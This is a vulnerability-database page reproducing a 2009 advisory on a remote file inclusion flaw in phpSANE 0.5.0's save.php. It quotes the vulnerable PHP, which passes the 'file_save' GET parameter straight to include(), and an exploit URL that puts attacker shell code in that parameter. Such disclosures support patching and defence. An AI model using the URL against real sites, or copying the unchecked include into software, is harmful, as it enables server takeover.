Lucene search
K

phpSANE 0.5.0 Remote File Inclusion

🗓️ 27 Aug 2009 00:00:00Reported by CoBRa_21Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

phpSANE 0.5.0 Remote File Inclusion Vulnerability, Author CoBRa_21, Download from Sourceforg

Code
`-----------------------------------------------------------------------------------  
phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability  
-----------------------------------------------------------------------------------  
Author: CoBRa_21  
Mail: [email protected]  
Script Download:http://sourceforge.net/projects/phpsane/  
Dork: Yok :P  
-----------------------------------------------------------------------------------  
BUG  
<?PHP  
include("language.php");  
  
$file_save = $_GET['file_save'];  
$file_save_image = $_GET['file_save_image'];  
$lang_id = $_GET['lang_id'];  
  
if ($file_save_image)  
{  
echo "<p class=\"align_center\">\n";  
echo "<img src=\"".$file_save."\" border=\"2\">\n";  
echo "</p>\n";  
}  
else  
{  
// my_pre my_mono  
echo "<p class=\"my_pre\">\n";  
include($file_save);  
echo "</p>\n";  
echo "<hr>\n";  
}  
-----------------------------------------------------------------------------------  
Exploit  
http://localhost/path/save.php?file_save= (Shell Code)  
-----------------------------------------------------------------------------------  
Tüm İslam Aleminin Ramazan-ı Şerifleri Hayırlı ve Mubarek Olsun.  
-----------------------------------------------------------------------------------  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation